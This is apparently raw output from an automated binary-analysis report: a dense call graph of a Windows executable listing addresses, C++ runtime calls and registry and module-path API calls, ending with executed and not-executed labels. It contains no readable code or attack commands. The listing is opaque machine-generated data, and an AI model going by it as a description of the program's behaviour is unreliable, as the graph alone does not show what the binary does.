7ff75a6ef21f 69589->69592 69590->69586 69592->69556 69594 7ff75a6ef4b7 _Receive_impl 69666 7ff75a6b12f0 82 API calls 69594->69666 69595 7ff75a6ef3d4 _Receive_impl 69665 7ff75a6b12f0 82 API calls 69595->69665 69598->69555 69598->69594 69600->69555 69600->69595 69601 7ff75a6ef66d 69673 7ff75a6b12f0 82 API calls 69601->69673 69603 7ff75a6ef76c 69674 7ff75a69cdc0 82 API calls 69603->69674 69605 7ff75a6ef7ae 69606 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69605->69606 69606->69552 69608 7ff75a6b27e0 82 API calls 69607->69608 69609 7ff75a6b537a 69608->69609 69610 7ff75a6b27e0 82 API calls 69609->69610 69611 7ff75a6b548d 69610->69611 69611->69510 69677 7ff75a6b4ab0 69612->69677 69619 7ff75a6baa1f 69703 7ff75a6b3520 78 API calls _Strcoll 69619->69703 69621 7ff75a6baaa8 69628 7ff75a6baa58 69621->69628 69705 7ff75a69cdc0 82 API calls 69621->69705 69622 7ff75a6baa31 69704 7ff75a6b78a0 115 API calls 4 library calls 69622->69704 69624 7ff75a6bab12 69626 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69624->69626 69627 7ff75a6bab23 69626->69627 69628->69560 69630 7ff75a6cfe0d 69629->69630 69632 7ff75a6cfef3 69629->69632 69908 7ff75a6d0bd0 69630->69908 69931 7ff75a69cdc0 82 API calls 69632->69931 69633 7ff75a6cfe32 69638 7ff75a6cfe69 69633->69638 69921 7ff75a6b08a0 69633->69921 69635 7ff75a6cfec0 69644 7ff75a6cfcd0 69635->69644 69636 7ff75a6cff35 69637 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69636->69637 69637->69638 69638->69635 69932 7ff75a69cdc0 82 API calls 69638->69932 69640 7ff75a6cff8e 69641 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69640->69641 69642 7ff75a6cffa2 69641->69642 69645 7ff75a6cfd00 69644->69645 69646 7ff75a6d0bd0 82 API calls 69645->69646 69647 7ff75a6cfd0f 69646->69647 69647->69574 69647->69577 69649 7ff75a6fd69d 69648->69649 69651 7ff75a6fd6b7 69648->69651 69649->69651 69661 7ff75a6b0ca0 82 API calls 69649->69661 69650 7ff75a6fd75a 69656 7ff75a6fd765 69650->69656 70043 7ff75a6b4600 82 API calls 5 library calls 69650->70043 69651->69650 70030 7ff75a6ff150 69651->70030 69654 7ff75a6fd7ea _Receive_impl 69655 7ff75a71e860 _Strcoll 8 API calls 69654->69655 69657 7ff75a6ef60d 69655->69657 69656->69654 69658 7ff75a6fd829 69656->69658 69657->69567 69667 7ff75a6b3620 69657->69667 69659 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69658->69659 69660 7ff75a6fd82e 69659->69660 69661->69651 69662->69569 69663->69575 69664->69589 69665->69589 69666->69589 69668 7ff75a6b363a 69667->69668 69672 7ff75a6b368a 69667->69672 69669 7ff75a6b3430 79 API calls 69668->69669 69670 7ff75a6b3674 69669->69670 70050 7ff75a703818 81 API calls _invalid_parameter_noinfo 69670->70050 69672->69601 69672->69603 69673->69592 69674->69605 69676->69573 69678 7ff75a71e888 std::_Facet_Register 82 API calls 69677->69678 69679 7ff75a6b4b11 69678->69679 69706 7ff75a72c5ec 69679->69706 69681 7ff75a6b4b21 69715 7ff75a6b4e10 69681->69715 69684 7ff75a6b4bae 69685 7ff75a6b4bbb 69684->69685 69730 7ff75a72c8b8 6 API calls std::_Lockit::_Lockit 69684->69730 69692 7ff75a6bc3b0 69685->69692 69687 7ff75a6b4bd6 69731 7ff75a69cdc0 82 API calls 69687->69731 69689 7ff75a6b4c16 69690 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69689->69690 69691 7ff75a6b4c27 69690->69691 69743 7ff75a6b4500 69692->69743 69695 7ff75a72cb28 69696 7ff75a72cb6e 69695->69696 69702 7ff75a6baa16 69696->69702 69748 7ff75a72e200 69696->69748 69700 7ff75a72cbbc 69700->69702 69768 7ff75a703818 81 API calls _invalid_parameter_noinfo 69700->69768 69702->69619 69702->69621 69703->69622 69704->69628 69705->69624 69732 7ff75a72bf8c 69706->69732 69708 7ff75a72c60e 69711 7ff75a72c652 ctype 69708->69711 69736 7ff75a72c7e4 82 API calls std::_Facet_Register 69708->69736 69710 7ff75a72c626 69737 7ff75a72c814 79 API calls std::locale::_Setgloballocale 69710->69737 69711->69681 69713 7ff75a72c631 69713->69711 69738 7ff75a707620 13 API calls 2 library calls 69713->69738 69716 7ff75a72bf8c std::_Lockit::_Lockit 6 API calls 69715->69716 69717 7ff75a6b4e40 69716->69717 69718 7ff75a72bf8c std::_Lockit::_Lockit 6 API calls 69717->69718 69720 7ff75a6b4e65 69717->69720 69718->69720 69719 7ff75a6b4edd 69721 7ff75a71e860 _Strcoll 8 API calls 69719->69721 69720->69719 69740 7ff75a69ca60 121 API calls 7 library calls 69720->69740 69722 7ff75a6b4b52 69721->69722 69722->69684 69722->69687 69724 7ff75a6b4eef 69725 7ff75a6b4ef5 69724->69725 69726 7ff75a6b4f56 69724->69726 69741 7ff75a72c5ac 82 API calls std::_Facet_Register 69725->69741 69742 7ff75a69c5a0 82 API calls 2 library calls 69726->69742 69729 7ff75a6b4f5b 69730->69685 69731->69689 69733 7ff75a72bf9b 69732->69733 69734 7ff75a72bfa0 69732->69734 69739 7ff75a70c42c 6 API calls std::_Lockit::_Lockit 69733->69739 69734->69708 69736->69710 69737->69713 69738->69711 69740->69724 69741->69719 69742->69729 69744 7ff75a71e888 std::_Facet_Register 82 API calls 69743->69744 69745 7ff75a6b4577 69744->69745 69746 7ff75a72c5ec 89 API calls 69745->69746 69747 7ff75a6b4587 69746->69747 69747->69621 69747->69695 69749 7ff75a72e12c 69748->69749 69750 7ff75a72e152 69749->69750 69753 7ff75a72e185 69749->69753 69781 7ff75a704e68 11 API calls _get_daylight 69750->69781 69752 7ff75a72e157 69782 7ff75a708234 78 API calls _invalid_parameter_noinfo 69752->69782 69755 7ff75a72e198 69753->69755 69756 7ff75a72e18b 69753->69756 69769 7ff75a70d6a8 69755->69769 69783 7ff75a704e68 11 API calls _get_daylight 69756->69783 69757 7ff75a72cba1 69757->69702 69767 7ff75a707e14 78 API calls _invalid_parameter_noinfo 69757->69767 69767->69700 69768->69702 69786 7ff75a70c3bc EnterCriticalSection 69769->69786 69781->69752 69782->69757 69783->69757 69909 7ff75a6d0c10 69908->69909 69913 7ff75a6d0bed 69908->69913 69911 7ff75a6d0c1e 69909->69911 69933 7ff75a6baf10 69909->69933 69910 7ff75a6d0c0a 69910->69633 69911->69633 69913->69910 69957 7ff75a69cdc0 82 API calls 69913->69957 69915 7ff75a6d0c73 69916 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69915->69916 69920 7ff75a6d0c84 _Receive_impl 69916->69920 69917 7ff75a6d0de5 69917->69633 69918 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69919 7ff75a6d0f37 69918->69919 69920->69917 69920->69918 69922 7ff75a6b08d3 69921->69922 69930 7ff75a6b092b 69922->69930 69963 7ff75a6b3430 69922->69963 69924 7ff75a71e860 _Strcoll 8 API calls 69925 7ff75a6b0999 69924->69925 69925->69638 69926 7ff75a6b08f6 69927 7ff75a6b0916 69926->69927 69926->69930 69973 7ff75a707d7c 69926->69973 69927->69930 69981 7ff75a707374 69927->69981 69930->69924 69931->69636 69932->69640 69934 7ff75a6baf4e 69933->69934 69935 7ff75a6bafd0 69933->69935 69958 7ff75a6b9f00 82 API calls 69934->69958 69936 7ff75a71e860 _Strcoll 8 API calls 69935->69936 69938 7ff75a6baffd 69936->69938 69938->69911 69939 7ff75a6baf5b 69940 7ff75a6bafbd 69939->69940 69942 7ff75a6bb012 69939->69942 69940->69935 69959 7ff75a6bc530 82 API calls 2 library calls 69940->69959 69960 7ff75a69cdc0 82 API calls 69942->69960 69944 7ff75a6bb054 69945 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69944->69945 69946 7ff75a6bb065 69945->69946 69947 7ff75a6bb0bb 69946->69947 69948 7ff75a6baf10 82 API calls 69946->69948 69949 7ff75a6bb1c8 69947->69949 69950 7ff75a6bb18a 69947->69950 69948->69947 69962 7ff75a69cdc0 82 API calls 69949->69962 69951 7ff75a6bb19b 69950->69951 69961 7ff75a6bc530 82 API calls 2 library calls 69950->69961 69951->69911 69954 7ff75a6bb20a 69955 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69954->69955 69956 7ff75a6bb21b 69955->69956 69957->69915 69958->69939 69959->69935 69960->69944 69961->69951 69962->69954 69964 7ff75a6b3502 69963->69964 69965 7ff75a6b3453 69963->69965 69966 7ff75a71e860 _Strcoll 8 API calls 69964->69966 69965->69964 69971 7ff75a6b345d 69965->69971 69967 7ff75a6b3511 69966->69967 69967->69926 69968 7ff75a6b34a1 69969 7ff75a71e860 _Strcoll 8 API calls 69968->69969 69970 7ff75a6b34be 69969->69970 69970->69926 69971->69968 69990 7ff75a704cf0 79 API calls _invalid_parameter_noinfo 69971->69990 69974 7ff75a707dac 69973->69974 69991 7ff75a707b0c 69974->69991 69977 7ff75a707dea 69979 7ff75a707dff 69977->69979 70003 7ff75a6ff864 78 API calls 2 library calls 69977->70003 69979->69927 69982 7ff75a70739d 69981->69982 69983 7ff75a707388 69981->69983 69982->69983 69984 7ff75a7073a2 69982->69984 70014 7ff75a704e68 11 API calls _get_daylight 69983->70014 70006 7ff75a710274 69984->70006 69987 7ff75a70738d 70015 7ff75a708234 78 API calls _invalid_parameter_noinfo 69987->70015 69988 7ff75a707398 69988->69930 69990->69968 69992 7ff75a707b76 69991->69992 69993 7ff75a707b36 69991->69993 69992->69993 69994 7ff75a707b82 69992->69994 70005 7ff75a708168 78 API calls 2 library calls 69993->70005 70004 7ff75a704934 EnterCriticalSection 69994->70004 69996 7ff75a707b5d 69996->69977 70002 7ff75a6ff864 78 API calls 2 library calls 69996->70002 70002->69977 70003->69979 70005->69996 70007 7ff75a7102a4 70006->70007 70016 7ff75a70fd80 70007->70016 70010 7ff75a7102e3 70012 7ff75a7102f8 70010->70012 70027 7ff75a6ff864 78 API calls 2 library calls 70010->70027 70012->69988 70014->69987 70015->69988 70017 7ff75a70fdca 70016->70017 70018 7ff75a70fd9b 70016->70018 70028 7ff75a704934 EnterCriticalSection 70017->70028 70029 7ff75a708168 78 API calls 2 library calls 70018->70029 70021 7ff75a70fdbb 70021->70010 70026 7ff75a6ff864 78 API calls 2 library calls 70021->70026 70026->70010 70027->70012 70029->70021 70044 7ff75a6ff080 70030->70044 70032 7ff75a6ff362 70032->69650 70034 7ff75a6ff39f 70049 7ff75a69b820 82 API calls 2 library calls 70034->70049 70035 7ff75a6ff080 82 API calls 70042 7ff75a6ff18c ctype _Receive_impl 70035->70042 70037 7ff75a6ff3a5 70038 7ff75a6ff394 70040 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70038->70040 70039 7ff75a71e888 82 API calls std::_Facet_Register 70039->70042 70041 7ff75a6ff399 70040->70041 70048 7ff75a69b8e0 82 API calls 70041->70048 70042->70032 70042->70034 70042->70035 70042->70038 70042->70039 70042->70041 70043->69656 70045 7ff75a6ff096 70044->70045 70046 7ff75a6ff0b3 70044->70046 70045->70046 70047 7ff75a6b0ca0 82 API calls 70045->70047 70046->70042 70047->70046 70049->70037 70050->69672 70051->69531 70052 7ff75a70918c 70053 7ff75a7091bd 70052->70053 70054 7ff75a7091a2 70052->70054 70053->70054 70055 7ff75a7091d6 70053->70055 70085 7ff75a704e68 11 API calls _get_daylight 70054->70085 70057 7ff75a7091dc 70055->70057 70060 7ff75a7091f9 70055->70060 70087 7ff75a704e68 11 API calls _get_daylight 70057->70087 70058 7ff75a7091a7 70086 7ff75a708234 78 API calls _invalid_parameter_noinfo 70058->70086 70079 7ff75a7133d0 70060->70079 70066 7ff75a709473 70067 7ff75a708284 _invalid_parameter_noinfo_noreturn 17 API calls 70066->70067 70069 7ff75a709488 70067->70069 70073 7ff75a70923d 70074 7ff75a709256 70073->70074 70075 7ff75a7092b6 70073->70075 70078 7ff75a7091b3 70074->70078 70106 7ff75a713414 78 API calls _isindst 70074->70106 70075->70078 70107 7ff75a713414 78 API calls _isindst 70075->70107 70080 7ff75a7133df 70079->70080 70083 7ff75a7091fe 70079->70083 70108 7ff75a70c3bc EnterCriticalSection 70080->70108 70088 7ff75a7124e8 70083->70088 70085->70058 70086->70078 70087->70078 70089 7ff75a7124f1 70088->70089 70091 7ff75a709213 70088->70091 70109 7ff75a704e68 11 API calls _get_daylight 70089->70109 70091->70066 70094 7ff75a712518 70091->70094 70092 7ff75a7124f6 70110 7ff75a708234 78 API calls _invalid_parameter_noinfo 70092->70110 70095 7ff75a712521 70094->70095 70097 7ff75a709224 70094->70097 70111 7ff75a704e68 11 API calls _get_daylight 70095->70111 70097->70066 70100 7ff75a712548 70097->70100 70098 7ff75a712526 70112 7ff75a708234 78 API calls _invalid_parameter_noinfo 70098->70112 70101 7ff75a709235 70100->70101 70102 7ff75a712551 70100->70102 70101->70066 70101->70073 70113 7ff75a704e68 11 API calls _get_daylight 70102->70113 70104 7ff75a712556 70114 7ff75a708234 78 API calls _invalid_parameter_noinfo 70104->70114 70106->70078 70107->70078 70109->70092 70110->70091 70111->70098 70112->70097 70113->70104 70114->70101 70115 7ff75a6da41b 70116 7ff75a6da433 70115->70116 70117 7ff75a6da468 _Receive_impl 70115->70117 70116->70117 70120 7ff75a6da8d0 70116->70120 70118 7ff75a6da4c1 _Receive_impl 70117->70118 70123 7ff75a6da8d5 70117->70123 70119 7ff75a6da515 _Receive_impl 70118->70119 70124 7ff75a6da8db 70118->70124 70122 7ff75a71e860 _Strcoll 8 API calls 70119->70122 70121 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70120->70121 70121->70123 70125 7ff75a6da543 70122->70125 70126 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70123->70126 70127 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70124->70127 70126->70124 70128 7ff75a6da8e1 70127->70128 70185 7ff75a6f0040 70128->70185 70130 7ff75a6da93f __scrt_get_show_window_mode 70131 7ff75a6da97e GetModuleFileNameW 70130->70131 70132 7ff75a6da9c0 70131->70132 70132->70132 70133 7ff75a6a6940 82 API calls 70132->70133 70134 7ff75a6da9dd 70133->70134 70135 7ff75a6a6940 82 API calls 70134->70135 70136 7ff75a6dabfe 70135->70136 70261 7ff75a6a6bd0 70136->70261 70138 7ff75a6dac0c 70275 7ff75a6b5fd0 85 API calls 70138->70275 70140 7ff75a6dac26 70141 7ff75a6a6940 82 API calls 70140->70141 70142 7ff75a6dae9d 70141->70142 70143 7ff75a6a6bd0 82 API calls 70142->70143 70144 7ff75a6daeab 70143->70144 70276 7ff75a6b5fd0 85 API calls 70144->70276 70146 7ff75a6daec6 70147 7ff75a6a6940 82 API calls 70146->70147 70148 7ff75a6db13e 70147->70148 70277 7ff75a69d4a0 82 API calls 70148->70277 70150 7ff75a6db15a 70278 7ff75a6b5fd0 85 API calls 70150->70278 70152 7ff75a6db16f 70153 7ff75a6a6940 82 API calls 70152->70153 70154 7ff75a6db61d 70153->70154 70155 7ff75a6a6bd0 82 API calls 70154->70155 70156 7ff75a6db62e 70155->70156 70279 7ff75a6b5fd0 85 API calls 70156->70279 70158 7ff75a6db64c 70159 7ff75a6a6940 82 API calls 70158->70159 70160 7ff75a6db8dd 70159->70160 70161 7ff75a6a6bd0 82 API calls 70160->70161 70162 7ff75a6db8ee 70161->70162 70280 7ff75a6b5fd0 85 API calls 70162->70280 70164 7ff75a6db90c 70165 7ff75a6a6940 82 API calls 70164->70165 70166 7ff75a6dbb90 70165->70166 70167 7ff75a6a6bd0 82 API calls 70166->70167 70168 7ff75a6dbba1 70167->70168 70281 7ff75a6b5fd0 85 API calls 70168->70281 70170 7ff75a6dbbbf 70171 7ff75a6a6940 82 API calls 70170->70171 70172 7ff75a6dbdaa 70171->70172 70173 7ff75a6a6bd0 82 API calls 70172->70173 70174 7ff75a6dbdbb 70173->70174 70282 7ff75a6b5fd0 85 API calls 70174->70282 70176 7ff75a6dbdd9 70177 7ff75a6a6940 82 API calls 70176->70177 70178 7ff75a6dc0ef 70177->70178 70179 7ff75a6a6bd0 82 API calls 70178->70179 70180 7ff75a6dc100 70179->70180 70283 7ff75a6b5fd0 85 API calls 70180->70283 70182 7ff75a6dc11e 70284 7ff75a69cf70 70182->70284 70186 7ff75a6f00d3 70185->70186 70288 7ff75a69d810 70186->70288 70188 7ff75a6f00f8 _Receive_impl 70189 7ff75a69eaf0 97 API calls 70188->70189 70190 7ff75a6f064c 70188->70190 70193 7ff75a6f0164 __scrt_get_show_window_mode 70189->70193 70191 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70190->70191 70192 7ff75a6f0652 70191->70192 70334 7ff75a69e240 87 API calls Concurrency::cancel_current_task 70192->70334 70196 7ff75a6ba910 148 API calls 70193->70196 70209 7ff75a6f01a6 70193->70209 70195 7ff75a6f0207 _Receive_impl 70198 7ff75a71e860 _Strcoll 8 API calls 70195->70198 70201 7ff75a6f0289 70196->70201 70197 7ff75a6f0647 70199 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70197->70199 70200 7ff75a6f0239 70198->70200 70199->70190 70200->70130 70202 7ff75a6f02cd 70201->70202 70203 7ff75a6f0539 70201->70203 70297 7ff75a6b56a0 70202->70297 70333 7ff75a6b12f0 82 API calls 70203->70333 70209->70192 70209->70195 70209->70197 70262 7ff75a6a6bfe 70261->70262 70265 7ff75a6a6ced 70262->70265 70267 7ff75a6a6c1a ctype 70262->70267 70268 7ff75a6a6cb4 70262->70268 70269 7ff75a6a6c8d 70262->70269 70271 7ff75a6a6cf3 70262->70271 70549 7ff75a69b820 82 API calls 2 library calls 70265->70549 70267->70138 70270 7ff75a71e888 std::_Facet_Register 82 API calls 70268->70270 70269->70265 70272 7ff75a71e888 std::_Facet_Register 82 API calls 70269->70272 70270->70267 70550 7ff75a69b8e0 82 API calls 70271->70550 70273 7ff75a6a6c9e 70272->70273 70273->70267 70274 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70273->70274 70274->70265 70275->70140 70276->70146 70277->70150 70278->70152 70279->70158 70280->70164 70281->70170 70282->70176 70283->70182 70285 7ff75a69cf8d 70284->70285 70286 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70285->70286 70287 7ff75a69cf9e 70286->70287 70291 7ff75a69d850 70288->70291 70289 7ff75a69d97a 70290 7ff75a6a6bd0 82 API calls 70289->70290 70292 7ff75a69d982 70290->70292 70291->70289 70294 7ff75a69d896 70291->70294 70339 7ff75a69d140 70292->70339 70296 7ff75a69d8fa ctype 70294->70296 70338 7ff75a6bec90 82 API calls 5 library calls 70294->70338 70296->70188 70298 7ff75a6b37f0 82 API calls 70297->70298 70299 7ff75a6b56d6 70298->70299 70357 7ff75a6bee00 70299->70357 70303 7ff75a6b5745 70443 7ff75a6b9450 70303->70443 70333->70209 70338->70296 70346 7ff75a69d15f 70339->70346 70340 7ff75a69d26b 70341 7ff75a69d297 70340->70341 70345 7ff75a69d2c0 70340->70345 70342 7ff75a69d35e 70341->70342 70349 7ff75a69d2a7 70341->70349 70356 7ff75a6b45e0 82 API calls 70342->70356 70345->70349 70354 7ff75a6b7fd0 82 API calls 5 library calls 70345->70354 70346->70340 70351 7ff75a69d24a 70346->70351 70347 7ff75a69d255 70347->70296 70355 7ff75a6b25d0 82 API calls ctype 70349->70355 70353 7ff75a69d9c0 82 API calls ctype 70351->70353 70353->70347 70354->70349 70355->70347 70358 7ff75a6bee54 70357->70358 70359 7ff75a70494c 78 API calls 70358->70359 70360 7ff75a6bef3a 70359->70360 70361 7ff75a6bc600 82 API calls 70360->70361 70362 7ff75a6bef61 70361->70362 70453 7ff75a69f1f0 70362->70453 70365 7ff75a71e860 _Strcoll 8 API calls 70366 7ff75a6b5739 70365->70366 70367 7ff75a6b9f80 70366->70367 70368 7ff75a6ba291 70367->70368 70372 7ff75a6b9fcb __scrt_get_show_window_mode 70367->70372 70461 7ff75a6c1e10 70368->70461 70371 7ff75a6bc600 82 API calls 70379 7ff75a6ba2d0 70371->70379 70528 7ff75a6bb5b0 82 API calls 70372->70528 70374 7ff75a6ba01b 70529 7ff75a6c0c20 84 API calls 2 library calls 70374->70529 70376 7ff75a6ba4c6 70389 7ff75a6ba28c _Receive_impl 70376->70389 70440 7ff75a6ba575 70376->70440 70377 7ff75a6ba02b 70381 7ff75a6bc600 82 API calls 70377->70381 70378 7ff75a6b37f0 82 API calls 70382 7ff75a6ba48c 70378->70382 70383 7ff75a6bb780 84 API calls 70379->70383 70430 7ff75a6ba457 _Receive_impl 70379->70430 70380 7ff75a71e860 _Strcoll 8 API calls 70384 7ff75a6ba51c 70380->70384 70396 7ff75a6ba037 70381->70396 70385 7ff75a6b3ff0 82 API calls 70382->70385 70386 7ff75a6ba31d 70383->70386 70384->70303 70385->70376 70388 7ff75a6c1af0 84 API calls 70386->70388 70387 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70392 7ff75a6ba57b 70387->70392 70393 7ff75a6ba343 70388->70393 70389->70380 70390 7ff75a6ba225 70395 7ff75a6ba27f 70390->70395 70400 7ff75a6b37f0 82 API calls 70390->70400 70391 7ff75a6ba1dd 70394 7ff75a6b37f0 82 API calls 70391->70394 70531 7ff75a6b3e90 80 API calls 70392->70531 70397 7ff75a6bbd00 84 API calls 70393->70397 70399 7ff75a6ba1f8 70394->70399 70530 7ff75a6bb3d0 82 API calls 2 library calls 70395->70530 70401 7ff75a6bb780 84 API calls 70396->70401 70442 7ff75a6ba1c4 _Receive_impl 70396->70442 70411 7ff75a6ba352 _Receive_impl 70397->70411 70408 7ff75a6b3ff0 82 API calls 70399->70408 70400->70399 70404 7ff75a6ba083 70401->70404 70403 7ff75a6ba5aa 70532 7ff75a6b3e90 80 API calls 70403->70532 70407 7ff75a6c1af0 84 API calls 70404->70407 70405 7ff75a6ba588 70409 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70405->70409 70414 7ff75a6ba0a9 70407->70414 70408->70395 70410 7ff75a6ba598 70409->70410 70420 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70410->70420 70411->70403 70412 7ff75a7207d0 __std_exception_destroy 13 API calls 70411->70412 70415 7ff75a6ba5c7 70411->70415 70416 7ff75a6ba3ca 70412->70416 70413 7ff75a6ba5b7 70417 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70413->70417 70418 7ff75a6bbd00 84 API calls 70414->70418 70419 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70415->70419 70421 7ff75a7207d0 __std_exception_destroy 13 API calls 70416->70421 70417->70415 70422 7ff75a6ba0b9 70418->70422 70424 7ff75a6ba5cd 70419->70424 70425 7ff75a6ba59e 70420->70425 70431 7ff75a6ba3d8 _Receive_impl 70421->70431 70422->70392 70423 7ff75a6ba0ce 70422->70423 70423->70410 70426 7ff75a6ba105 _Receive_impl 70423->70426 70427 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70424->70427 70428 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70425->70428 70429 7ff75a7207d0 __std_exception_destroy 13 API calls 70426->70429 70432 7ff75a6ba5d3 70427->70432 70433 7ff75a6ba5a4 70428->70433 70434 7ff75a6ba139 70429->70434 70430->70376 70430->70378 70431->70424 70431->70430 70435 7ff75a6ba570 70431->70435 70432->70303 70438 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70433->70438 70436 7ff75a7207d0 __std_exception_destroy 13 API calls 70434->70436 70437 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70435->70437 70439 7ff75a6ba147 70436->70439 70437->70440 70438->70403 70439->70425 70441 7ff75a6ba17e _Receive_impl 70439->70441 70440->70387 70441->70433 70441->70442 70442->70390 70442->70391 70444 7ff75a6b946c _Receive_impl 70443->70444 70445 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70444->70445 70446 7ff75a6b9504 70444->70446 70445->70446 70447 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70446->70447 70449 7ff75a6b950a _Receive_impl 70447->70449 70450 7ff75a6b957e 70449->70450 70544 7ff75a6b95a0 78 API calls 2 library calls 70449->70544 70451 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 70450->70451 70452 7ff75a6b9591 70451->70452 70454 7ff75a69f227 70453->70454 70455 7ff75a69f1fe 70453->70455 70454->70365 70455->70454 70460 7ff75a69cdc0 82 API calls 70455->70460 70457 7ff75a69f25e 70458 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70457->70458 70459 7ff75a69f26f 70458->70459 70460->70457 70462 7ff75a6c1e8d 70461->70462 70463 7ff75a6c2a5c 70461->70463 70464 7ff75a6bb780 84 API calls 70463->70464 70465 7ff75a6c2a9c 70464->70465 70466 7ff75a6c1af0 84 API calls 70465->70466 70467 7ff75a6c2ac2 70466->70467 70468 7ff75a6bbd00 84 API calls 70467->70468 70469 7ff75a6c2ad2 70468->70469 70470 7ff75a6c2b3d 70469->70470 70471 7ff75a6c2add 70469->70471 70533 7ff75a6b3e90 80 API calls 70470->70533 70473 7ff75a6b2880 78 API calls 70471->70473 70475 7ff75a6c2ae7 70473->70475 70474 7ff75a6c2b49 70476 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70474->70476 70477 7ff75a69eec0 13 API calls 70475->70477 70478 7ff75a6c2b59 70476->70478 70479 7ff75a6c2af1 70477->70479 70534 7ff75a6b3e90 80 API calls 70478->70534 70481 7ff75a6b2880 78 API calls 70479->70481 70483 7ff75a6c2afb 70481->70483 70482 7ff75a6c2b66 70484 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70482->70484 70486 7ff75a6b2880 78 API calls 70483->70486 70485 7ff75a6c2b76 70484->70485 70535 7ff75a6b3e90 80 API calls 70485->70535 70488 7ff75a6c2b06 70486->70488 70491 7ff75a6bc4d0 78 API calls 70488->70491 70489 7ff75a6c2b83 70490 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70489->70490 70492 7ff75a6c2b93 70490->70492 70493 7ff75a6c2b14 70491->70493 70536 7ff75a6c4430 80 API calls 70492->70536 70495 7ff75a71e860 _Strcoll 8 API calls 70493->70495 70497 7ff75a6ba2c4 70495->70497 70496 7ff75a6c2ba0 70498 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70496->70498 70497->70371 70499 7ff75a6c2bb0 70498->70499 70537 7ff75a6b3e90 80 API calls 70499->70537 70501 7ff75a6c2bbd 70502 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70501->70502 70503 7ff75a6c2bcd 70502->70503 70538 7ff75a6b3e90 80 API calls 70503->70538 70505 7ff75a6c2bda 70506 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70505->70506 70507 7ff75a6c2bea 70506->70507 70539 7ff75a6b3e90 80 API calls 70507->70539 70509 7ff75a6c2bf7 70510 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70509->70510 70511 7ff75a6c2c07 70510->70511 70540 7ff75a6b3e90 80 API calls 70511->70540 70513 7ff75a6c2c14 70514 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70513->70514 70515 7ff75a6c2c24 70514->70515 70541 7ff75a6b3e90 80 API calls 70515->70541 70517 7ff75a6c2c31 70518 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70517->70518 70519 7ff75a6c2c41 70518->70519 70542 7ff75a6b3e90 80 API calls 70519->70542 70521 7ff75a6c2c4e 70522 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70521->70522 70523 7ff75a6c2c5e 70522->70523 70543 7ff75a6b3e90 80 API calls 70523->70543 70525 7ff75a6c2c6b 70526 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 70525->70526 70527 7ff75a6c2c7b 70526->70527 70528->70374 70529->70377 70530->70389 70531->70405 70532->70413 70533->70474 70534->70482 70535->70489 70536->70496 70537->70501 70538->70505 70539->70509 70540->70513 70541->70517 70542->70521 70543->70525 70549->70271 70551 7ff75a6f6e1b RegOpenKeyExA 70552 7ff75a6f6e45 RegQueryValueExA 70551->70552 70560 7ff75a6f6ebd _Receive_impl 70551->70560 70556 7ff75a6f6e84 70552->70556 70552->70560 70553 7ff75a6f6f14 RegCloseKey 70554 7ff75a6f6f1a 70553->70554 70557 7ff75a71e860 _Strcoll 8 API calls 70554->70557 70561 7ff75a6b28e0 78 API calls 2 library calls 70556->70561 70558 7ff75a6f6f2d 70557->70558 70560->70553 70560->70554 70561->70560 70562 7ff75a714e91 70574 7ff75a71bf24 70562->70574 70575 7ff75a709eec _Getcoll 78 API calls 70574->70575 70576 7ff75a71bf2d 70575->70576 70579 7ff75a7098b4 78 API calls __std_fs_directory_iterator_open 70576->70579 70580 7ff75a6bc8de 70585 7ff75a6bd4b0 70580->70585 70583 7ff75a71e860 _Strcoll 8 API calls 70584 7ff75a6bc91b 70583->70584 70587 7ff75a6bd4d6 70585->70587 70586 7ff75a6bd502 70589 7ff75a6be200 82 API calls 70586->70589 70587->70586 70588 7ff75a6c9fb0 82 API calls 70587->70588 70588->70586 70590 7ff75a6bc8e6 70589->70590 70590->70583 70591 7ff75a6fcb57 70592 7ff75a6fcb61 70591->70592 70593 7ff75a6fd050 84 API calls 70592->70593 70594 7ff75a6fcb70 70593->70594 70595 7ff75a71e860 _Strcoll 8 API calls 70594->70595 70596 7ff75a6fceb3 70595->70596

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
